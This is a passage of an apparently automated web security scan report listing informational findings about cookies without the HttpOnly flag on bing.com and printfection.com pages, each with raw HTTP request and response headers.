User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:09:22 GMT
Connection: close
Set-Cookie: _SS=SID=84364DCD717D4D0BB86135D1E06CC7AF; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865529; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=FA19F2A46E8B44F79C0D92A1E319533C; expires=Thu, 18-Jul-2013 12:09:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

8.20. http://www.bing.com/fd/ls/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=0a2cf4887a3946bf9d66aedb51daf8c2&CID=14230B4BB5064F8B9C1A3D1C2C91E937&PM=Y&Type=Event.CPT&DATA={"pp":{"S":"L","PC":28,"FC":-1,"BC":28,"BS":45,"H":46,"FE":-1,"LE":-1,"C1":-1,"C2":-1,"BP":47,"KP":-1,"CT":606,"IL":2}}&P=SERP&DA=Bl2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:09:23 GMT
Connection: close
Set-Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865529; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1; expires=Thu, 18-Jul-2013 12:09:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

8.21. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/AppGalleryDisplayProvider.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/AppGalleryDisplayProvider.ashx?q=&mkt=en&FORM=BYLH HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4562
Content-Type: application/json; charset=utf-8
Expires: -1
X-BM-TraceID: 381b21893e064134838136a47cf10f1d
X-Ve-Server: BL2-01211-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=BYLH; expires=Thu, 18-Jul-2013 12:09:42 GMT; domain=.bing.com; path=/

window.appGalleryContainerJSON = {"catUrl":"http://c0.ecn.catalogservice.virtualearth.net/cs/dc/pf/Catalog/676cd0b3-da60-4183-a07f-59d638480169_Catalog.xap.png","AppGalleryMarkup":"\r\n\r\n\u003cdiv i
...[SNIP]...

8.22. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/AppGalleryDisplayProvider.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/AppGalleryDisplayProvider.ashx?q=Jonah+Hill&mkt=en-US&FORM=BYFD HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4562
Content-Type: application/json; charset=utf-8
Expires: -1
X-BM-TraceID: e73c6b6f5dbd46658ecc67e88bfb7ca8
X-Ve-Server: BL2-01203-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:11:38 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=BYFD&MS=1865531&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:38 GMT; domain=.bing.com; path=/

window.appGalleryContainerJSON = {"catUrl":"http://c0.ecn.catalogservice.virtualearth.net/cs/dc/pf/Catalog/676cd0b3-da60-4183-a07f-59d638480169_Catalog.xap.png","AppGalleryMarkup":"\r\n\r\n\u003cdiv i
...[SNIP]...

8.23. http://www.bing.com/maps/MapAppsScript.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/MapAppsScript.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/MapAppsScript.ashx?q=&mkt=en&FORM=BYLH HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
X-BM-TraceID: 45902850fb194154bf99af43b8d3f5ac
X-Ve-Server: BL2-01209-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=BYLH; expires=Thu, 18-Jul-2013 12:09:42 GMT; domain=.bing.com; path=/
Content-Length: 6709

var slContainerText = "<div id='silverlightControlHost' style='height: 1px; width: 2px; top: 30px; left: 0px; position: absolute;'><object id='mapAppSL' data='data:application/x-silverlight-2,' type='
...[SNIP]...

8.24. http://www.bing.com/maps/MapAppsScript.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/MapAppsScript.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/MapAppsScript.ashx?q=&mkt=en-US&FORM=BYFD HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
X-BM-TraceID: ba10842c4078412f98876aba4f7bb278
X-Ve-Server: BL2-01204-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:10:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=BYFD&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:00 GMT; domain=.bing.com; path=/
Content-Length: 6709

var slContainerText = "<div id='silverlightControlHost' style='height: 1px; width: 2px; top: 30px; left: 0px; position: absolute;'><object id='mapAppSL' data='data:application/x-silverlight-2,' type='
...[SNIP]...

8.25. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /maps/default.aspx?mkt=en-US&form=MPSRCH HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529&D=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719
Content-Length: 2657
Accept-Encoding: gzip, deflate

scriptManager=scriptManager%7cInvokeCategoryBrowser&__EVENTTARGET=InvokeCategoryBrowser&__EVENTARGUMENT=undefined&__VIEWSTATE=%2fwEPDwUJMTMyNzQzNzcxD2QWDGYPFgIeBFRleHQFCTxmZDpoZWFkPmQCBg8WAh8ABQo8L2Zk
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 717d213c93e1401590752582d6ba7a32
X-Ve-Server: BL2-01208-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:10:00 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865530&D=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:10:00 GMT; domain=.bing.com; path=/
Content-Length: 11836

6516|updatePanel|TaskHost_Search|
   
                           <span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;"></span><
...[SNIP]...

8.26. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /maps/default.aspx?mkt=en&form=MPSRCH HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.bing.com
Content-Length: 2647
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

scriptManager=scriptManager%7cInvokeCategoryBrowser&__EVENTTARGET=InvokeCategoryBrowser&__EVENTARGUMENT=undefined&__VIEWSTATE=%2fwEPDwUJMTMyNzQzNzcxD2QWDGYPFgIeBFRleHQFCTxmZDpoZWFkPmQCBg8WAh8ABQo8L2Zk
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 0c13e1f5d3e94de590841c22ebc809c4
X-Ve-Server: BL2-01202-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; expires=Thu, 18-Jul-2013 12:09:31 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:31 GMT; domain=.bing.com; path=/
Content-Length: 11829

6516|updatePanel|TaskHost_Search|
   
                           <span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;"></span><
...[SNIP]...

8.27. http://www.bing.com/news/s/news3B_c.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3B_c.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/s/news3B_c.css?v=1126040805 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1865529&MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=2451BC32004969401AB2BE06044969F0&TUID=1; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Fri, 26 Nov 2010 04:08:05 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 16909
Date: Tue, 19 Jul 2011 12:09:51 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=SM=1&D=1865529&MS=1865529&AF=NOFORM; expires=Thu, 18-Jul-2013 12:09:51 GMT; domain=.bing.com; path=/

.NewsAlertForm{position:absolute;color:#555;text-decoration:none;display:block;float:right;margin-top:100px;*margin-top:0;margin-right:0;z-index:100;top:75px;left:25px}.NewsAlertForm .AlertDropDownHea
...[SNIP]...

8.28. http://www.bing.com/news/s/news3B_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3B_c.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3B_c.js?v=0822204709 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Last-Modified: Sun, 22 Aug 2010 20:47:09 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 4228
Date: Tue, 19 Jul 2011 12:10:50 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:50 GMT; domain=.bing.com; path=/

var _ghlc=4;function _ghlp(a){return _ge("id_hlp_"+a)}function _ghlt(a){return _ge("id_hlt_"+a)}function _gishide(a){return a.style.display=="none"}function _gisshow(a){return!_gishide(a)}function _gs
...[SNIP]...

8.29. http://www.bing.com/news/s/news3S_c.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3S_c.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3S_c.css?v=1110024132 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529&SM=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Wed, 10 Nov 2010 02:41:32 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 16722
Date: Tue, 19 Jul 2011 12:09:57 GMT
Connection: close
Set-Cookie: SRCHD=D=1865529&MS=1865529&SM=1&AF=NOFORM; expires=Thu, 18-Jul-2013 12:09:57 GMT; domain=.bing.com; path=/

.Content UL{margin:0;padding:0;list-style-type:none}.Content LI{display:block;list-style-type:none}.QueryAlterations{margin-bottom:.38em;padding-bottom:.38em;color:#333}.Header .QueryAlterations{borde
...[SNIP]...

8.30. http://www.bing.com/news/s/news3S_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3S_c.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3S_c.js?v=0829160238 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Last-Modified: Sun, 29 Aug 2010 16:02:38 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 4140
Date: Tue, 19 Jul 2011 12:11:10 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:10 GMT; domain=.bing.com; path=/

function _changeHeight(g,e,b,c){var d,a=e,f=function(){if(a<b&&a+c<b||a>b&&a+c>b)a+=c;else{a=b;clearInterval(d)}g.style.height=a+"px"};d=setInterval(f,20)}function _p(a){return a.parentNode}function _
...[SNIP]...

8.31. http://www.bing.com/videos/vthumb_c.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/vthumb_c.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/vthumb_c.css?v=0819000746 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Thu, 19 Aug 2010 00:07:46 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 1540
Date: Tue, 19 Jul 2011 12:11:14 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:14 GMT; domain=.bing.com; path=/

.vt_med,.vt_med img{display:-moz-inline-stack;display:inline-block;position:relative;width:140px}.vt_md{margin-top:5px;font-size:95%}.vt_md a{text-decoration:none}.vt_md .st_c{color:#568e1a;float:left
...[SNIP]...

8.32. http://www.printfection.com/torprojectstore

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /torprojectstore HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 01:59:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
